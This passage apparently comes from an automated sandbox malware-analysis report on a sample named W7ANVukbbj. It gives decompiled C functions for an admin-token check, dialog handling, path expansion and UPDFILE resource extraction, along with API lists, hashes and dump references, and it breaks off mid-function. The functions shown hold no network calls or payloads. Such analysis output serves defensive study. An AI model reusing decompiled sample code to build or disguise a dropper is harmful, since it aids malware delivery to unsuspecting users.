                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                          • String ID: TITLE$herso
                                                                                                                                                                                                          • API String ID: 3370778649-823998585
                                                                                                                                                                                                          • Opcode ID: 5a85dce2a8f3e0d06d0613bab782cb286893e60fb367663001ed70794b0c10d2
                                                                                                                                                                                                          • Instruction ID: 57a92e4848f4d98f8c94b03a6dc387b11393de090a13c888f368c21084dd28e4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a85dce2a8f3e0d06d0613bab782cb286893e60fb367663001ed70794b0c10d2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC018636244210BBF3541BA5AC4DF6B7E2DFBD6B51F061014FA4AE6150C9F188418AA6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 57%
                                                                                                                                                                                                          			E008617EE(intOrPtr* __ecx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				short _v12;
                                                                                                                                                                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                          				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                          				intOrPtr* _v28;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t14;
                                                                                                                                                                                                          				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                          				long _t28;
                                                                                                                                                                                                          				void* _t35;
                                                                                                                                                                                                          				struct HINSTANCE__* _t36;
                                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                                          				intOrPtr* _t39;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t14 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                          				_v12 = 0x500;
                                                                                                                                                                                                          				_t37 = __ecx;
                                                                                                                                                                                                          				_v16.Value = 0;
                                                                                                                                                                                                          				_v28 = __ecx;
                                                                                                                                                                                                          				_t28 = 0;
                                                                                                                                                                                                          				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                          				if(_t36 != 0) {
                                                                                                                                                                                                          					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                          					_v20 = _t20;
                                                                                                                                                                                                          					if(_t20 != 0) {
                                                                                                                                                                                                          						 *_t37 = 0;
                                                                                                                                                                                                          						_t28 = 1;
                                                                                                                                                                                                          						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                          							_t37 = _t39;
                                                                                                                                                                                                          							 *0x86a288(0, _v24, _v28);
                                                                                                                                                                                                          							_v20();
                                                                                                                                                                                                          							if(_t39 != _t39) {
                                                                                                                                                                                                          								asm("int 0x29");
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							FreeSid(_v24);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					FreeLibrary(_t36);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                          			}




















                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,008618DD), ref: 0086181A
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0086182C
                                                                                                                                                                                                          • AllocateAndInitializeSid.ADVAPI32(008618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,008618DD), ref: 00861855
                                                                                                                                                                                                          • FreeSid.ADVAPI32(?,?,?,?,008618DD), ref: 00861883
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,008618DD), ref: 0086188A
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                          • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                          • API String ID: 4204503880-1888249752
                                                                                                                                                                                                          • Opcode ID: 15748a4db605529cb9f959bf39f8ba37513ce95e541b62a029b3d374f8274492
                                                                                                                                                                                                          • Instruction ID: ad664476b6cf12c2768c3d53e31b7cddf9aa864c5f70c707684bdb5a5fc7bf5b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15748a4db605529cb9f959bf39f8ba37513ce95e541b62a029b3d374f8274492
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03119371E00209EBDB149FA4DC49ABEBB78FF44700F161569FA15F7291DB709D048B92
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00863450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                          				void* _t11;
                                                                                                                                                                                                          				struct HWND__* _t12;
                                                                                                                                                                                                          				int _t22;
                                                                                                                                                                                                          				struct HWND__* _t24;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t7 = _a8 - 0x10;
                                                                                                                                                                                                          				if(_t7 == 0) {
                                                                                                                                                                                                          					EndDialog(_a4, 2);
                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t11 = _t7 - 0x100;
                                                                                                                                                                                                          				if(_t11 == 0) {
                                                                                                                                                                                                          					_t12 = GetDesktopWindow();
                                                                                                                                                                                                          					_t24 = _a4;
                                                                                                                                                                                                          					E008643D0(_t24, _t12);
                                                                                                                                                                                                          					SetWindowTextA(_t24, "herso");
                                                                                                                                                                                                          					SetDlgItemTextA(_t24, 0x838,  *0x869404);
                                                                                                                                                                                                          					SetForegroundWindow(_t24);
                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t11 == 1) {
                                                                                                                                                                                                          					_t22 = _a12;
                                                                                                                                                                                                          					if(_t22 < 6) {
                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t22 <= 7) {
                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                          						EndDialog(_a4, _t22);
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t22 != 0x839) {
                                                                                                                                                                                                          						goto L11;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *0x8691dc = 1;
                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}









                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EndDialog.USER32(?,?), ref: 00863490
                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0086349A
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,herso), ref: 008634B2
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,00000838), ref: 008634C4
                                                                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 008634CB
                                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 008634D8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                          • String ID: herso
                                                                                                                                                                                                          • API String ID: 852535152-3992069730
                                                                                                                                                                                                          • Opcode ID: c289bbbbc7a76ef8bc11cfb07d682bd17cab66a35bbbd7fd97fd5b85243f823f
                                                                                                                                                                                                          • Instruction ID: c2a974391c5f302a9792289eca702e25803107e305e812c5966e2addc32e2ba3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c289bbbbc7a76ef8bc11cfb07d682bd17cab66a35bbbd7fd97fd5b85243f823f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4301D431240118ABC71A5F69EC0C96DBB64FB16700F135010F947E66A0CFB59F51CB89
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                          			E00862AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                          				int _t21;
                                                                                                                                                                                                          				char _t32;
                                                                                                                                                                                                          				intOrPtr _t34;
                                                                                                                                                                                                          				char* _t38;
                                                                                                                                                                                                          				char _t42;
                                                                                                                                                                                                          				char* _t44;
                                                                                                                                                                                                          				CHAR* _t52;
                                                                                                                                                                                                          				intOrPtr* _t55;
                                                                                                                                                                                                          				CHAR* _t59;
                                                                                                                                                                                                          				void* _t62;
                                                                                                                                                                                                          				CHAR* _t64;
                                                                                                                                                                                                          				CHAR* _t65;
                                                                                                                                                                                                          				signed int _t66;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t60 = __edx;
                                                                                                                                                                                                          				_t16 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                          				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                          				_t65 = _a4;
                                                                                                                                                                                                          				_t44 = __edx;
                                                                                                                                                                                                          				_t64 = __ecx;
                                                                                                                                                                                                          				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                          					GetModuleFileNameA( *0x869a3c,  &_v268, 0x104);
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						_t17 =  *_t64;
                                                                                                                                                                                                          						if(_t17 == 0) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                          						 *_t65 =  *_t64;
                                                                                                                                                                                                          						if(_t21 != 0) {
                                                                                                                                                                                                          							_t65[1] = _t64[1];
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						if( *_t64 != 0x23) {
                                                                                                                                                                                                          							L19:
                                                                                                                                                                                                          							_t65 = CharNextA(_t65);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_t64 = CharNextA(_t64);
                                                                                                                                                                                                          							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                          								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                          									if( *_t64 == 0x23) {
                                                                                                                                                                                                          										goto L19;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									E00861680(_t65, E008617C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                          									_t52 = _t65;
                                                                                                                                                                                                          									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                          									_t60 = _t14;
                                                                                                                                                                                                          									do {
                                                                                                                                                                                                          										_t32 =  *_t52;
                                                                                                                                                                                                          										_t52 =  &(_t52[1]);
                                                                                                                                                                                                          									} while (_t32 != 0);
                                                                                                                                                                                                          									goto L17;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								E008665E8( &_v268);
                                                                                                                                                                                                          								_t55 =  &_v268;
                                                                                                                                                                                                          								_t62 = _t55 + 1;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_t34 =  *_t55;
                                                                                                                                                                                                          									_t55 = _t55 + 1;
                                                                                                                                                                                                          								} while (_t34 != 0);
                                                                                                                                                                                                          								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                          								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                          									 *_t38 = 0;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								E00861680(_t65, E008617C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                          								_t59 = _t65;
                                                                                                                                                                                                          								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                          								_t60 = _t12;
                                                                                                                                                                                                          								do {
                                                                                                                                                                                                          									_t42 =  *_t59;
                                                                                                                                                                                                          									_t59 =  &(_t59[1]);
                                                                                                                                                                                                          								} while (_t42 != 0);
                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                          								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t64 = CharNextA(_t64);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					 *_t65 = _t17;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                          			}























                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00862AE6
                                                                                                                                                                                                          • IsDBCSLeadByte.KERNEL32(00000000), ref: 00862AF2
                                                                                                                                                                                                          • CharNextA.USER32(?), ref: 00862B12
                                                                                                                                                                                                          • CharUpperA.USER32 ref: 00862B1E
                                                                                                                                                                                                          • CharPrevA.USER32(?,?), ref: 00862B55
                                                                                                                                                                                                          • CharNextA.USER32(?), ref: 00862BD4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 571164536-0
                                                                                                                                                                                                          • Opcode ID: 676a498b0fe214d74a92ef1af2e7057ca5e53591fa61d290f456bcece05eb595
                                                                                                                                                                                                          • Instruction ID: 1a1eb7ef079786bf318c35a1490e4f69bbd0cd80c1338792a0b550ca2fc82b1c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 676a498b0fe214d74a92ef1af2e7057ca5e53591fa61d290f456bcece05eb595
                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE4103346046859EDB199F349C14AFD7BA9FF52320F0A00DAE8C2D7202DF754E868B61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E008643D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				struct tagRECT _v24;
                                                                                                                                                                                                          				struct tagRECT _v40;
                                                                                                                                                                                                          				struct HWND__* _v44;
                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                          				int _v52;
                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                          				int _v60;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                          				void* _t53;
                                                                                                                                                                                                          				intOrPtr _t56;
                                                                                                                                                                                                          				int _t59;
                                                                                                                                                                                                          				struct HWND__* _t63;
                                                                                                                                                                                                          				struct HWND__* _t67;
                                                                                                                                                                                                          				struct HWND__* _t68;
                                                                                                                                                                                                          				struct HDC__* _t69;
                                                                                                                                                                                                          				int _t72;
                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t63 = __edx;
                                                                                                                                                                                                          				_t29 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                          				_t68 = __edx;
                                                                                                                                                                                                          				_v44 = __ecx;
                                                                                                                                                                                                          				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                          				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                          				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                          				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                          				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                          				_t69 = GetDC(_v44);
                                                                                                                                                                                                          				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                          				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                          				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                          				_t56 = _v48;
                                                                                                                                                                                                          				asm("cdq");
                                                                                                                                                                                                          				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                          				_t67 = 0;
                                                                                                                                                                                                          				if(_t72 >= 0) {
                                                                                                                                                                                                          					_t63 = _v52;
                                                                                                                                                                                                          					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                          						_t72 = _t63 - _t56;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t72 = _t67;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				asm("cdq");
                                                                                                                                                                                                          				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                          				if(_t59 >= 0) {
                                                                                                                                                                                                          					_t63 = _v60;
                                                                                                                                                                                                          					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                          						_t59 = _t63 - _t53;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t59 = _t67;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return E00866CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                          			}

























                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 008643F1
                                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0086440B
                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00864423
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0086442E
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0086443A
                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00864447
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 008644A2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2212493051-0
                                                                                                                                                                                                          • Opcode ID: 36afeddf5854909a0c92378d1cd7fe5dba2a21171821a12b74f2c5dffc99bbdb
                                                                                                                                                                                                          • Instruction ID: 9c9879a7e50edcbdf47b22e4f347fef47430a764281dcc115d4c1bbd6d7a8e1c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36afeddf5854909a0c92378d1cd7fe5dba2a21171821a12b74f2c5dffc99bbdb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56314B32E00119AFCB14CFB8DD899EEBBB5FB89310F165169F806F3240DA70AC058B65
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                                          			E00866298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                          				struct HINSTANCE__* _v36;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                          				struct HRSRC__* _t21;
                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                          				struct HINSTANCE__* _t36;
                                                                                                                                                                                                          				intOrPtr* _t40;
                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                          				intOrPtr* _t44;
                                                                                                                                                                                                          				intOrPtr* _t45;
                                                                                                                                                                                                          				void* _t47;
                                                                                                                                                                                                          				signed int _t50;
                                                                                                                                                                                                          				struct HINSTANCE__* _t51;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t44 = __edx;
                                                                                                                                                                                                          				_t16 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                          				_t46 = 0;
                                                                                                                                                                                                          				_v32 = __ecx;
                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                          				_t36 = 1;
                                                                                                                                                                                                          				E0086171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t51 = _t51 + 0x10;
                                                                                                                                                                                                          					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                          					if(_t21 == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                          					if(_t45 == 0) {
                                                                                                                                                                                                          						 *0x869124 = 0x80070714;
                                                                                                                                                                                                          						_t36 = _t46;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                          						_t44 = _t5;
                                                                                                                                                                                                          						_t40 = _t44;
                                                                                                                                                                                                          						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                          						_t47 = _t6;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t26 =  *_t40;
                                                                                                                                                                                                          							_t40 = _t40 + 1;
                                                                                                                                                                                                          						} while (_t26 != 0);
                                                                                                                                                                                                          						_t41 = _t40 - _t47;
                                                                                                                                                                                                          						_t46 = _t51;
                                                                                                                                                                                                          						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                          						 *0x86a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                          						_t30 = _v32();
                                                                                                                                                                                                          						if(_t51 != _t51) {
                                                                                                                                                                                                          							asm("int 0x29");
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_push(_t45);
                                                                                                                                                                                                          						if(_t30 == 0) {
                                                                                                                                                                                                          							_t36 = 0;
                                                                                                                                                                                                          							FreeResource(??);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							FreeResource();
                                                                                                                                                                                                          							_v36 = _v36 + 1;
                                                                                                                                                                                                          							E0086171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                          							_t46 = 0;
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                          					return E00866CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L12;
                                                                                                                                                                                                          			}























                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086171E: _vsnprintf.MSVCRT ref: 00861750
                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,008651CA,00000004,00000024,00862F71,?,00000002,00000000), ref: 008662CD
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,008651CA,00000004,00000024,00862F71,?,00000002,00000000), ref: 008662D4
                                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008651CA,00000004,00000024,00862F71,?,00000002,00000000), ref: 0086631B
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00866345
                                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,008651CA,00000004,00000024,00862F71,?,00000002,00000000), ref: 00866357
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                          • String ID: UPDFILE%lu
                                                                                                                                                                                                          • API String ID: 2922116661-2329316264
                                                                                                                                                                                                          • Opcode ID: 9057978f130cfc17423515812a06c9af770ac56ed4299dcb09985fc5c754a90f
                                                                                                                                                                                                          • Instruction ID: bb7ec774de51ec6d3330548cd5021da380da5b7189a67733aebce3e913247173
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9057978f130cfc17423515812a06c9af770ac56ed4299dcb09985fc5c754a90f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB212331A00219ABCB149F649D499BEBB78FB48704B060129F902E3341EB798D128BE1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                          			E0086681F(void* __ebx) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                          				void* _v172;
                                                                                                                                                                                                          				int* _v176;
                                                                                                                                                                                                          				int _v180;
                                                                                                                                                                                                          				int _v184;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t19;
